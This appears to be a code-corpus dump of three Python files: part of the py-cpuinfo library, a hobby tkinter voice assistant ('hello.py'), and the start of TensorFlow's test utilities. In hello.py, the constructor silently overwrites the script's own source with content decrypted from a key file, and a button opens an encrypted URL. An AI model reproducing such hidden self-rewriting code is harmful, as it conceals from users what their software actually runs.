Returns {} if not on Windows, or wmic is not installed.
'''
g_trace.header('Tying to get info from wmic ...')
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
g_trace.fail('Failed to find WMIC, or not on Windows. Skipping ...')
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run wmic. Skipping ...')
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize') # NOTE: L2CacheSize is in kilobytes
if l2_cache_size:
l2_cache_size = int(l2_cache_size) * 1024
l3_cache_size = value.get('L3CacheSize') # NOTE: L3CacheSize is in kilobytes
if l3_cache_size:
l3_cache_size = int(l3_cache_size) * 1024
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
g_trace.header('Tying to get info from Windows registry ...')
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
g_trace.fail('Not running on Windows. Skipping ...')
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
g_trace.header('Tying to get info from kstat ...')
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
g_trace.fail('Failed to find isinfo or kstat. Skipping ...')
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
g_trace.fail('Failed to run \"isainfo -vb\". Skipping ...')
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
g_trace.fail('Failed to run \"kstat -m cpu_info\". Skipping ...')
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_platform_uname():
g_trace.header('Tying to get info from platform.uname ...')
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
g_trace.write('!' * 80)
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
g_trace.write("python_version: {0}".format(info['python_version']))
g_trace.write("cpuinfo_version: {0}".format(info['cpuinfo_version']))
g_trace.write("arch: {0}".format(info['arch']))
g_trace.write("bits: {0}".format(info['bits']))
g_trace.write("count: {0}".format(info['count']))
g_trace.write("arch_string_raw: {0}".format(info['arch_string_raw']))
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
# FIXME: This should print stdout and stderr to trace log
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
g_trace.write('!' * 80)
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a json string
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# if not running under pyinstaller, run in another process.
# This is done because multiprocesing has a design flaw that
# causes non main programs to run multiple times on Windows.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a dict
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
parser.add_argument('--trace', action='store_true', help='Traces code paths used to find CPU info to file')
args = parser.parse_args()
global g_trace
g_trace = Trace(args.trace, False)
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
g_trace = Trace(False, False)
_check_arch()
|
hello.py
|
# Artificial-Assistant V1.0
'''
# Feature v1.0:
- Open some websites such as google, facebook, youtube, whatsapp, etc.
- Play a video on youtube. You can try by saying 'How to make a coffee on youtube' or 'youtube how to be a good person'.
'''
import __init__
from time import sleep
from tkinter import *
import pyttsx3
from PIL import Image, ImageTk
import os
from threading import Thread
from cryptocode import decrypt
from random import choice, randint
import webbrowser as wb
import requests
from datetime import datetime as dt
from playsound import playsound
encryptKey = open(f'{os.getcwd()}\\hello.key', 'r').read().split('|')
voice_ = {}
engine = pyttsx3.init('sapi5')
count = 0
voices = engine.getProperty('voices')
for voice in voices:
voice_[voice.name] = count
count += 1
engine.setProperty('voice', voices[int(encryptKey[1])].id)
engine.setProperty('rate', 150)
def randchoice(lst: list, much: int):
output = []
for _ in range(much):
x = randint(0,len(lst)-1)
output.append(lst[x])
lst.pop(x)
return output
def timeBG():
hour = dt.now().hour
if hour > 4 and hour <= 10:
greet = 'morning'
elif hour > 10 and hour <= 18:
greet = 'afternoon'
else:
greet = 'evening'
return greet
class UI(Tk):
cwd = os.getcwd()
key = 'key'
codeBy = 'Code By: ardyuda' # Cannot Be Removed
name = 'Assistant'
t = decrypt('VRnkBS65IYjHUsGkiDoD53bgnkl5sxRufs/wuB4gj3HqGlORIIMOU0X52r/gahQ=*K/ZBq1ZfatgAActBmAWaiQ==*KWyb8JsBXrux2clpswELmQ==*QVy9zmgJ295tc/bqNgzWlw==', encryptKey[0])
def __init__(self):
super().__init__()
self.geometry("430x300+0-30")
self.title("Artificial Assistant")
self.iconbitmap(f'{self.cwd}\\images\\icon.ico')
# frames
self.frame00 = Frame()
self.frame0a = Frame()
self.frame0b = Frame()
self.frame0c = Frame()
self.frame1a = Frame()
self.frame1b = Frame()
# others
self.r = encryptKey[0]
self.dt = ''
open(__file__, 'w').write(decrypt(encryptKey[2], encryptKey[0]))
self.text1, self.text2, self.text3 = self.suggestion()
self.msgLimit = []
self.run = quit
self.notrun = self.run
self.frame0_()
self.process(choice(['hello', timeBG(), None]))
def buttonCmd(self, id):
try:
self.me
except:
self.run()
if id == 0:
self.waveImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\radio-waves.jpg'))
self.microphone['image'] = self.waveImg
self.microphone['state'] = DISABLED
self.keyboard['state'] = DISABLED
self.setting['state'] = DISABLED
Thread(target=self.hear, args=(10,)).start()
if id == '00':
Thread(target=wb.open, args=(self.t,)).start()
if id == 1:
self.sendImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\send-message.jpg'))
self.backImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\left-arrow.jpg'))
self.setting_Img = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\setting_.jpg'))
self.keyboard['image'] = self.backImg
self.keyboard['command'] = lambda: self.buttonCmd(3)
self.msg = Entry(self.frame0c, border=0, font='Raleway', width='33')
self.msg.pack(side=LEFT, padx=5)
self.microphone['image'] = self.sendImg
self.microphone['command'] = lambda: self.buttonCmd(2)
self.setting['image'] = self.setting_Img
if id == 2:
msg = self.msg.get()
self.myMsg(msg)
Thread(target=self.process, args=(msg,)).start()
self.msg.destroy()
self.msg = Entry(self.frame0c, border=0, font='Raleway', width='33')
self.msg.pack(side=LEFT, padx=5)
if id == 3:
self.keyboard['image'] = self.keboardImg
self.keyboard['command'] = lambda: self.buttonCmd(1)
self.msg.destroy()
self.setting['image'] = self.settingImg
self.microphone['image'] = self.microphoneImg
self.microphone['command'] = lambda: self.buttonCmd(0)
if id == 4:
self.frame0_(create=False)
self.frame1_(create=True)
if id == 5:
self.frame1_(create=False)
self.frame0_(create=True)
if id == 6:
for key, val in voice_.items():
if key == self.lang.get() and 'english' in self.lang.get().lower():
encryptKey[1] = str(val)
open(f'{self.cwd}\\hello.key', 'w').write('|'.join(encryptKey))
engine.setProperty('voice', voices[val].id)
self.frame1_(create=False)
self.frame0_(create=True)
return
self.label1['text'] = 'Cannot Change Language!'
self.label1['fg'] = 'red'
if id == 7:
self.myMsg(self.text1)
Thread(target=self.process, args=(self.text1,)).start()
if id == 8:
self.myMsg(self.text2)
Thread(target=self.process, args=(self.text2,)).start()
if id == 9:
self.myMsg(self.text3)
Thread(target=self.process, args=(self.text3,)).start()
def frame0_(self, create=True):
if create:
# frame0a
self.frame0a = Frame()
self.frame0a.pack(expand=True, fill=BOTH)
# frame0b
self.frame0b = Frame()
self.frame0b.pack()
self.button0a = Button(self.frame0b, text=self.text1, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(7))
self.button0b = Button(self.frame0b, text=self.text2, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(8))
self.button0c = Button(self.frame0b, text=self.text3, bg='white', fg='gray', bd= 0, command=lambda: self.buttonCmd(9))
self.button0a.pack(side=LEFT, padx=10, pady=10)
self.button0b.pack(side=LEFT, padx=10)
self.button0c.pack(side=LEFT, padx=10)
# frame0c
self.frame0c = Frame()
self.frame0c.pack()
self.frame00 = Frame()
self.frame00.pack()
self.microphoneImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\microphone.jpg'))
self.keboardImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\keyboard.jpg'))
self.settingImg = ImageTk.PhotoImage(Image.open(f'{self.cwd}\\images\\setting.jpg'))
self.keyboard = Button(self.frame0c, image= self.keboardImg, bd=0, command=lambda: self.buttonCmd(1), justify=LEFT)
self.keyboard.pack(side=LEFT, padx=5)
self.setting = Button(self.frame0c, image= self.settingImg, bd=0, command=lambda: self.buttonCmd(4))
self.setting.pack(side=RIGHT, padx=5)
self.microphone = Button(self.frame0c, image= self.microphoneImg, bd=0, command=lambda: self.buttonCmd(0))
self.microphone.pack(side=RIGHT, padx=5)
Label(self.frame0a, text=self.codeBy)
self.me = Button(self.frame00, text=decrypt(self.r, self.key), command=lambda: self.buttonCmd('00'), bd=0)
self.me.pack()
else:
self.frame0a.destroy()
self.frame0b.destroy()
self.frame0c.destroy()
self.frame00.destroy()
try:
global sr
import pyaudio
import speech_recognition as sr
except ImportError:
self.microphone['state'] = DISABLED
def frame1_ (self, create= True):
if create:
self.frame1a = Frame()
self.frame1a.pack(expand=True)
self.lang = StringVar()
self.label1 = Label(self.frame1a, text= 'Change Voice', font= 'Raleway')
self.label1.pack(pady=20)
for _voice in voice_.keys():
Radiobutton(self.frame1a, text= _voice, variable= self.lang, value= _voice).pack(anchor= W)
self.frame1b = Frame()
self.frame1b.pack(expand=True)
Button(self.frame1b, text='OK', bg='blue', fg='white', font='Raleway', padx=10, command=lambda: self.buttonCmd(6)).pack(side=LEFT, pady=30)
Button(self.frame1b, text='Back', bg='red', fg='white', font='Raleway', command=lambda: self.buttonCmd(5)).pack(side=LEFT, padx=20)
else:
self.frame1a.destroy()
self.frame1b.destroy()
def compress(self, text):
if len(text) >= 37:
textLimit = 0
textList = []
textSplit = text.split(' ')
for word in textSplit:
textLimit += len(word)
textList.append(word+' ')
if textLimit >= 37:
textList.append('\n')
textLimit = 0
textList[-1].replace(' ','')
text = ''.join(textList)
textList.clear()
return text
def myMsg(self, text):
if text != '':
msg = self.compress(text)
label = Label(self.frame0a, text= msg, font='Arial', fg='blue', bg='white', justify=LEFT)
self.msgLimit.append(label)
self.showMsg(E)
def comMsg(self, text):
msg = self.compress(text)
label = Label(self.frame0a, text= msg, font='Arial', fg='red', bg='white', justify=LEFT)
self.msgLimit.append(label)
self.showMsg(W)
def showMsg(self, anchor):
if len(self.msgLimit) >= 8:
self.msgLimit[0].destroy()
self.msgLimit.pop(0)
return self.msgLimit[-1].pack(anchor=anchor)
def suggestion(self):
if self.dt == '0-1':
lst = ['I\'m fine', 'I\'m good, how about you?', 'I\'m fine, and you?']
lst += randchoice(['hi', 'what is your name?', 'what can you do?', f'good {timeBG()}'], 2)
elif self.dt == '0-2':
lst = [decrypt(skill, encryptKey[0]) for skill in open(f'{self.cwd}\\data\\skill.library', 'r').read().split('-')]
lst += ['what can you do?', 'what else you can do?', 'what you can do?']
else:
lst = ['hello','how are you?', 'hi', 'what is your name?', 'what can you do?', f'good {timeBG()}', self.name, 'hello, how are you?']
return randchoice(lst, 3)
def change_suggestion(self):
self.text1, self.text2, self.text3 = self.suggestion()
self.button0a['text'] = self.text1
self.button0b['text'] = self.text2
self.button0c['text'] = self.text3
def say(self, text, waitTime=0):
if text == None:
return
sleep(waitTime)
engine.say(text)
self.comMsg(text)
self.change_suggestion()
try:
engine.runAndWait()
except:
pass
def hear(self, timeout= None):
r = sr.Recognizer()
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source, duration=1)
with sr.Microphone() as source:
print('mendengarkan...')
try:
try:
playsound(f'{self.cwd}\\audio\\listening.wav')
except:
pass
src = r.listen(source, phrase_time_limit=6, timeout=timeout)
word = r.recognize_google(src, language='en-US')
self.myMsg(word)
self.process(word)
except sr.RequestError:
word = None
except sr.UnknownValueError:
word = None
except sr.WaitTimeoutError:
word = None
finally:
self.microphone['image'] = self.microphoneImg
self.microphone['state'] = NORMAL
self.keyboard['state'] = NORMAL
self.setting['state'] = NORMAL
def process(self, word):
if word == None:
return
word = word.lower()
try:
self.me
except:
self.notrun()
def offer_help_again():
offer_help = ['is there anything I can help again?', 'is there anything else I can help you with?', None, None, None, None]
response = choice(offer_help)
Thread(target=self.say, args=(response,)).start()
skills = [decrypt(skill, encryptKey[0]) for skill in open(f'{self.cwd}\\data\\skill.library', 'r').read().split('-')]
askskills = ['what can you do', 'what do you can', 'what you can do', 'what else you can do?']
response_askskills = ['try saying @skill1 or @skill2', 'you can try by saying @skill1 or @skill2']
for askskill in askskills:
if askskill in word and len(skills) >= 2:
self.dt = '0-2'
skill1, skill2 = randchoice(skills, 2)
response = choice(response_askskills).replace('@skill1', f'\"{skill1}\"').replace('@skill2', f'\"{skill2}\"')
Thread(target=self.say, args=(response,)).start()
return
name = self.name
asknames = ['what is your name', 'who are you', "tell me your name"]
response_asknames = [f'you can call me {name}', f'hello, my name is {name}. I am an Artificial Assistant', f'hi, my name is {name}. I am an Artificial Assistant', f'my name is {name}. I am an Artificial Assistant',
f'hello, my name is {name}', f'hi, my name is {name}', f'my name is {name}']
for askname in asknames:
if askname in word:
self.dt = ''
response = choice(response_asknames)
Thread(target=self.say, args=(response,)).start()
return
askhays = ['how are you']
response_askhaysa = ['I\'m great, how about you sir?', 'I\'m fine, and you?', 'I\'m good, how about you?', 'I\'m fine, how about you?', 'I\'m good, and you?']
response_askhaysb = ['I\'m fine, is there anything I can help you with?', 'I\'m fine, what can I do for you?', 'I\'m good, what can I do for you?', 'I\'m good, is there anything I can help you with?']
for askhay in askhays:
if askhay in word:
self.dt = '0'
response = choice(response_askhaysa+response_askhaysb)
for dt_askhaysa in response_askhaysa:
if response == dt_askhaysa:
self.dt += '-1'
break
for dt_askhaysb in response_askhaysb:
if response == dt_askhaysb:
self.dt += '-2'
break
Thread(target=self.say, args=(response,)).start()
return
greetings1 = ["hello", "hi", "hey", "halo", 'helo']
responses_gts1a = ["hello sir, how are you?", "hi, how are you today?", "hi, how are you today?", "hello sir, how are you?"]
responses_gts1b = ["hello sir, how can I help you?", "hello sir, what can I do for you?", "hi, what can I do for you sir?", "hi, what can I do for you?", "hello, is there anything I can help you with?", "hi, is there anything I can help you with?", "hello sir, what\'s up?"]
for greeting1 in greetings1:
if word.startswith(greeting1):
self.dt = '0'
response = choice(responses_gts1a+responses_gts1b)
for dt_gts1a in responses_gts1a:
if response == dt_gts1a:
self.dt += '-1'
break
for dt_gts1b in responses_gts1b:
if response == dt_gts1b:
self.dt += '-2'
break
Thread(target=self.say, args=(response,)).start()
return
greetings2 = ["morning", "afternoon", "evening"]
responses_gts2a = [f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you?"]
responses_gts2b = [f"good {timeBG()} sir, how can I help you?", f"good {timeBG()}, what can I do for you?", f"{timeBG()}, is there anything I can help you with?"]
for greeting2 in greetings2:
if greeting2 in word:
if word.startswith('good') or greeting2 == word:
self.dt = '0'
if greeting2 == timeBG():
response = choice(responses_gts2a+responses_gts2b)
for dt_gts2a in responses_gts2a:
if response == dt_gts2a:
self.dt += '-1'
break
for dt_gts2b in responses_gts2b:
if response == dt_gts2b:
self.dt += '-2'
break
else:
response = choice([f"looks like it\'s {timeBG()} sir", f"I think it's {timeBG()} sir"])
Thread(target=self.say, args=(response,)).start()
return
webs = {
'amazon': 'https://www.amazon.com',
'facebook': 'https://www.facebook.com',
'drive': 'https://drive.google.com',
'gmail': 'https://mail.google.com',
'google drive': 'https://drive.google.com',
'google': 'https://www.google.com',
'instagram': 'https://www.instagram.com',
'paypal': 'https://www.paypal.com',
'savefrom': 'https://en.savefrom.net/20',
'shareit': 'https://pc.ushareit.com',
'twitter': 'https://twitter.com',
'whatsapp': 'https://web.whatsapp.com',
'youtube': 'https://www.youtube.com',
}
openwebs = ['open']
response_openwebs = ['okay, open @web', 'okay']
for openweb in openwebs:
for web, link in webs.items():
if f'{openweb} {web}' in word:
self.dt = '0-2'
response = choice(response_openwebs).replace('@web', web)
if 'can you' in word:
var = choice(['okay', 'sure', 'of course'])
response = response.replace('okay', var)
Thread(target=self.say, args=(response,)).start()
Thread(target=wb.open, args=(link,)).start()
offer_help_again()
return
def playyt(topic, open_video= True):
url = f"https://www.youtube.com/results?q={topic}"
count = 0
cont = requests.get(url)
data = cont.content
data = str(data)
lst = data.split('"')
for i in lst:
count += 1
if i == "WEB_PAGE_TYPE_WATCH":
break
if open_video:
wb.open(f"https://www.youtube.com{lst[count - 5]}")
responses_yt = ['okay, open youtube and show the result', 'okay, show the result']
if word.startswith('youtube ') or word.endswith(' in youtube') or word.endswith(' on youtube'):
self.dt = '0-2'
word = word.replace('youtube ','').replace(' in youtube', '').replace(' on youtube', '')
response = choice(responses_yt)
Thread(target=self.say, args=(response,)).start()
Thread(target=playyt, args=(word,)).start()
offer_help_again()
return
greetings1dt0 = ["i'm good", "i am good", "i'm fine", "i am fine", "i'm great", "i am great"]
responses_gts1dt0 = ["glad to hear that, is there anything I can help you with?", "glad to hear that, how can I help you?"]
if self.dt == '0-1':
for greeting1dt0 in greetings1dt0:
if word.startswith(greeting1dt0):
self.dt = '0-2'
if 'how about you' in word or 'and you' in word:
response = choice(response_askhaysb)
else:
response = choice(responses_gts1dt0)
Thread(target=self.say, args=(response,)).start()
return
if name.lower() in word:
self.dt = '0-2'
response = choice([choice(responses_gts1b), responses_gts1b[-1]])
Thread(target=self.say, args=(response,)).start()
return
if __name__ == '__main__':
app = UI()
app.mainloop()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return x.name
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
